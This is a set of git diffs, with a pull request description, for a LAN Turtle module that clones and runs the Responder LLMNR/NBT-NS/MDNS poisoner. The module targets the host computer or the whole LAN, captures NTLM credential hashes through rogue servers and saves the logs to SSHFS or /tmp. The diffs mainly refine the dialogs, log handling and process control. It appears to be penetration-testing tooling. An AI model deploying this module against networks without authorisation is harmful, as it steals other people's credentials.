 				if [[ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" || ! -d /tmp/Responder/logs ]]; then
-					rm -r /etc/turtle/Responder/logs
+					rm -rf /etc/turtle/Responder/logs
 					mkdir -p /tmp/Responder/logs
 					ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
 				fi
@@ -142,9 +148,11 @@ function start {
 				echo "Responder started and logs are being saved to /tmp/Responder"
 				;;
 			*)
-				echo "Responder configuration not valid. Please re-configure then try again."
-				rm -r /etc/config/responder
+				echo "Responder configuration not valid."
+				echo "Please re-configure then try again."
+				rm -f /etc/config/responder
 				exit 1
+				;;
 		esac
 	else
 		echo "Responder not configured."

--- a/modules/responder
+++ b/modules/responder
@@ -36,7 +36,7 @@ if [ -s /etc/config/responder ];
             mkdir -p /sshfs/Responder/logs
             ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
             echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
-            echo responder started and logs are being saved to /sshfs
+            echo responder started and logs are being saved to /sshfs/Responder/logs
           fi 
         else 
           echo "SSHFS not running"
@@ -48,7 +48,7 @@ if [ -s /etc/config/responder ];
             mkdir -p /tmp/Responder/logs
             ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
             echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
-            echo responder started and logs are being saved to /tmp
+            echo responder started and logs are being saved to /tmp/Responder/logs
 	fi
         ;;
     esac

--- a/modules/responder
+++ b/modules/responder
@@ -11,21 +11,21 @@ AUTHOR=IMcPwn
 : ${DIALOG_ESC=255}
 
 function start {
-  if [[ ! $(opkg list-installed | grep git) ]]; then
-     opkg update && opkg install git
-  fi
-  
-  if [[ ! $(opkg list-installed | grep python-sqlite3) ]]; then
-     opkg update && opkg install python-sqlite3
-  fi
-
-  if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]]; then
-      rm -r /etc/turtle/Responder
-      git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder
-  fi
-
-if [ -s /etc/config/responder ];
+  if [ -s /etc/config/responder ];
   then
+    if [[ ! $(opkg list-installed | grep git) ]]; then
+      opkg update && opkg install git
+    fi
+  
+    if [[ ! $(opkg list-installed | grep python-sqlite3) ]]; then
+      opkg update && opkg install python-sqlite3
+    fi
+
+    if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]]; then
+        rm -r /etc/turtle/Responder
+        git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder
+    fi
+    
     responder_log=$(uci get responder.log)
     case $responder_log in
       sshfs)
@@ -82,7 +82,7 @@ function configure {
     --help-button \
     --title "Responder Configuration" \
     --radiolist "\n\
-For information on the different log files, see Help\n\nNOTICE: The first time you run this module it may take a long time to load because of dependencies. Please let it finish.\n\nThe log files can be saved to SSHFS or /tmp.\n" 16 60 3\
+Responder will listen on a variety of ports to gather credentials. See Help for more information.\n\nNote: the first time you run this module it may take a long time to load because of dependencies.\n\nThe log files can be saved to SSHFS or tmp.\n" 16 60 3\
     1 "Save log to SSHFS if available." off\
     2 "Save log to /tmp/" off\
   2>$CONF
@@ -118,7 +118,7 @@ Analyze mode will be logged to Analyze-Session.log\n\
 Poisoning will be logged to Poisoners-Session.log\n\n\
 All hashes are dumped an unique file John Jumbo compliant, using this format:\n\
 (MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt\n\n\
-For more information, see: https://github.com/SpiderLabs/Responder\n\
+For even more information, see: https://github.com/SpiderLabs/Responder\n\
 " 25 60
       configure
       ;;

--- a/modules/responder
+++ b/modules/responder
@@ -14,6 +14,10 @@ function start {
   if [ ! -s /usr/bin/git ]; then
      opkg update && opkg install git 
   fi
+  
+  if [ ! -s /usr/lib/python2.7/sqlite3/dbapi2.py ]; then
+     opkg update && opkg install python-sqlite3
+  fi
 
   if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]]; then
       rm -r /etc/turtle/Responder
@@ -28,11 +32,11 @@ if [ -s /etc/config/responder ];
         if pgrep sshfs > /dev/null; then 
           echo "SSHFS Running"
           if [[ ! -L /etc/turtle/Responder/logs || ! -L /sshfs/Responder/logs ]]; then
-		rm -r /etc/turtle/Responder/logs
-		mkdir -p /sshfs/Responder/logs
-		ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
-                echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
-  		echo responder started and logs are being saved to /sshfs
+            rm -r /etc/turtle/Responder/logs
+            mkdir -p /sshfs/Responder/logs
+            ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
+            echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
+            echo responder started and logs are being saved to /sshfs
           fi 
         else 
           echo "SSHFS not running"
@@ -40,11 +44,11 @@ if [ -s /etc/config/responder ];
         ;;
       tmp)
 	if [[ ! -L /etc/turtle/Responder/logs || ! -L /tmp/Responder/logs ]]; then
-        	rm -r /etc/turtle/Responder/logs
-		mkdir -p /tmp/Responder/logs
-		ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
-                echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
-  		echo responder started and logs are being saved to /tmp
+            rm -r /etc/turtle/Responder/logs
+            mkdir -p /tmp/Responder/logs
+            ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
+            echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
+            echo responder started and logs are being saved to /tmp
 	fi
         ;;
     esac

--- a/modules/responder
+++ b/modules/responder
@@ -77,7 +77,7 @@ function configure {
     --help-button \
     --title "Responder Configuration" \
     --radiolist "\n\
-For information on the different log files, see "Help"\n\nNOTICE: The first time you run this module it may take a long time to load because of dependencies. Please let it finish.\n\nThe log files can be saved to SSHFS or /tmp.\n" 16 60 3\
+For information on the different log files, see Help\n\nNOTICE: The first time you run this module it may take a long time to load because of dependencies. Please let it finish.\n\nThe log files can be saved to SSHFS or /tmp.\n" 16 60 3\
     1 "Save log to SSHFS if available." off\
     2 "Save log to /tmp/" off\
   2>$CONF

--- a/modules/responder
+++ b/modules/responder
@@ -197,7 +197,7 @@ function check_internet {
     ping -q -w 5 -c 1 lanturtle.com &> /dev/null && {
         :
     } || {
-	echo -e "\nThe LAN Turtle is currently offline. The previous\noperation requires an internet connection."
+        echo -e "\nThe LAN Turtle is currently offline. The previous\noperation requires an internet connection."
         exit 1
     }
 }
@@ -293,7 +293,7 @@ function mode {
     --title "Responder Mode" \
     --help-button \
     --radiolist "Choose mode\n \n" 20 60 10\
-    1 "Default mode" on\
+    1 "Default mode" off\
     2 "Analyze mode" off\
     3 "Start WPAD rouge proxy server" off\
     4 "Enable answers for netbios suffix queries" off\

--- a/modules/responder
+++ b/modules/responder
@@ -203,7 +203,7 @@ The log files can be saved to SSHFS or tmp.\n" 16 60 3\
   esac
   configure
     ;;
-	$DIALOG_CANCEL)
+    $DIALOG_CANCEL)
       configure;;
     $DIALOG_ESC)
       configure;;
@@ -243,7 +243,7 @@ Responder can target the Host machine (The computer the LAN Turtle is plugged in
       esac
 	  configure
     ;;
-	$DIALOG_CANCEL)
+    $DIALOG_CANCEL)
       configure;;
     $DIALOG_ESC)
       configure;;
@@ -317,9 +317,9 @@ mode
 
 function responderconf {
 dialog \
+    --help-button \
     --title "Editing: /etc/turtle/Responder/Responder.conf" \
     --editbox /etc/turtle/Responder/Responder.conf 18 72\
-	--help-button \
   2>$CONF
   return=$?
   case $return in
@@ -327,9 +327,22 @@ dialog \
       cat $CONF | {
         cat $CONF > /etc/turtle/Responder/Responder.conf
         rm $CONF
+        configure
       };;
-	  esac
-	  configure
+    $DIALOG_HELP)
+      dialog --title "Help" \
+        --msgbox "For information on this configuration, see: https://github.com/SpiderLabs/Responder" 20 60
+      responderconf
+      ;;
+    $DIALOG_CANCEL)
+      rm $CONF
+      configure
+      ;;
+    $DIALOG_ESC)
+      rm $CONF
+      configure
+      ;;
+  esac
 }
 
 function configure {

--- a/modules/responder
+++ b/modules/responder
@@ -37,24 +37,24 @@ function start {
   
     if [[ ! $(opkg list-installed | grep git) ]];
     then
-      echo "Git not installed. Installing..."
+      echo "Dependency git not installed. Installing..."
       check_internet
-      opkg update && opkg install git
+      opkg update > /dev/null && opkg install git
     fi
     
     if [[ ! $(opkg list-installed | grep python-sqlite3) ]];
     then
-      echo "Python-sqlite3 not installed. Installing..."
+      echo "Dependency python-sqlite3 not installed. Installing..."
       check_internet
-      opkg update && opkg install python-sqlite3
+      opkg update > /dev/null && opkg install python-sqlite3
     fi
     
     if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py || ! -s /etc/turtle/Responder/Responder.conf ]];
     then
-      echo "Responder files are not valid. Downloading..."
+      echo "Required Responder files not found. Downloading..."
       check_internet
       rm -rf /etc/turtle/Responder
-      git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder
+      git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder -q
     fi
     
     case $responder_mode in
@@ -112,6 +112,7 @@ function start {
           
           echo "python /etc/turtle/Responder/Responder.py $mode -I $responder_interface" | at now
           echo -e "Responder started in mode $responder_mode against interface $responder_interface\nand logs are being saved to /sshfs/Responder"
+          echo "Logs can be viewed at Configure > log > View log"
         else 
           echo "SSHFS not running"
           exit 1
@@ -150,6 +151,7 @@ function start {
         
         echo "python /etc/turtle/Responder/Responder.py $mode -I $responder_interface" | at now
         echo -e "Responder started in mode $responder_mode against interface $responder_interface\nand logs are being saved to /tmp/Responder"
+        echo "Logs can be viewed at Configure > log > View log"
         ;;
       *)
         echo "Responder configuration not valid."

--- a/modules/responder
+++ b/modules/responder
@@ -1,5 +1,9 @@
 #!/bin/bash /usr/lib/turtle/turtle_module
-VERSION="2.3"
+
+# responder by IMcPwn
+# http://imcpwn.com
+
+VERSION="2.4"
 DESCRIPTION="Responder - LLMNR, NBT-NS and MDNS poisoner"
 CONF=/tmp/responder.form
 AUTHOR=IMcPwn
@@ -149,9 +153,10 @@ function start {
           ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
         fi
         
-        echo "python /etc/turtle/Responder/Responder.py $mode -I $responder_interface" | at now
+        echo "python /etc/turtle/Responder/Responder.py $mode -I $responder_interface &" | at now
         echo -e "Responder started in mode $responder_mode against interface $responder_interface\nand logs are being saved to /tmp/Responder"
-        echo "Logs can be viewed at Configure > log > View log"
+        echo "Responder started with pid"
+        pgrep -f Responder.py
         ;;
       *)
         echo "Responder configuration not valid."
@@ -187,8 +192,8 @@ function stop {
     iptables -D INPUT -i eth1 -p tcp --dport 1433 -j ACCEPT
     iptables -D INPUT -i eth1 -p tcp --dport 3141 -j ACCEPT
   fi
-  
-  kill $(ps | grep -w [/]etc/turtle/Responder/Responder.py | awk {'print $1'})
+  if pgrep -f Responder.py > /dev/null; then kill $(pgrep -f Responder.py); fi
+  echo "Responder stopped"
 }
 
 function status {

--- a/modules/responder
+++ b/modules/responder
@@ -1,5 +1,5 @@
 #!/bin/bash /usr/lib/turtle/turtle_module
-VERSION="2.0"
+VERSION="2.1"
 DESCRIPTION="Responder - LLMNR, NBT-NS and MDNS poisoner"
 CONF=/tmp/responder.form
 AUTHOR=IMcPwn
@@ -141,6 +141,10 @@ function start {
 				echo "python /etc/turtle/Responder/Responder.py $mode -I $responder_interface" | at now
 				echo "Responder started and logs are being saved to /tmp/Responder"
 				;;
+			*)
+				echo "Responder configuration not valid. Please re-configure then try again."
+				rm -r /etc/config/responder
+				exit 1
 		esac
 	else
 		echo "Responder not configured."
@@ -181,6 +185,8 @@ function status {
 function log {
 dialog --ok-label "Submit" \
     --title "Responder Log Configuration" \
+	--extra-button \
+	--extra-label "View log" \
 	--help-button \
     --radiolist "\n\
 The log files can be saved to SSHFS or tmp.\n" 16 60 3\
@@ -207,6 +213,20 @@ The log files can be saved to SSHFS or tmp.\n" 16 60 3\
       configure;;
     $DIALOG_ESC)
       configure;;
+	$DIALOG_EXTRA)
+		responder_log=$(uci get responder.log)
+		case $responder_log in
+			sshfs)
+				dialog --title "/sshfs/Responder/logs/Responder-Session.log" --clear --tailbox "/sshfs/Responder/logs/Responder-Session.log" 18 72
+				;;
+			tmp)
+				dialog --title "/tmp/Responder/logs/Responder-Session.log" --clear --tailbox "/tmp/Responder/logs/Responder-Session.log" 18 72
+				;;
+			*)
+				echo "Responder log location not configured."
+				log;;
+		esac
+		log;;
 	$DIALOG_HELP)
 		dialog --title "Help" --msgbox "\n\
 All activity will be logged to Responder-Session.log\n\


### PR DESCRIPTION
Responder is an LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. The program itself can be viewed here: https://github.com/SpiderLabs/Responder

I have created a module that downloads and uses this program against the computer the LAN Turtle is plugged in to and saves the logs to sshfs or tmp.

V2 allows for the targeting of the entire LAN as well as all of the current Responder options as modes.
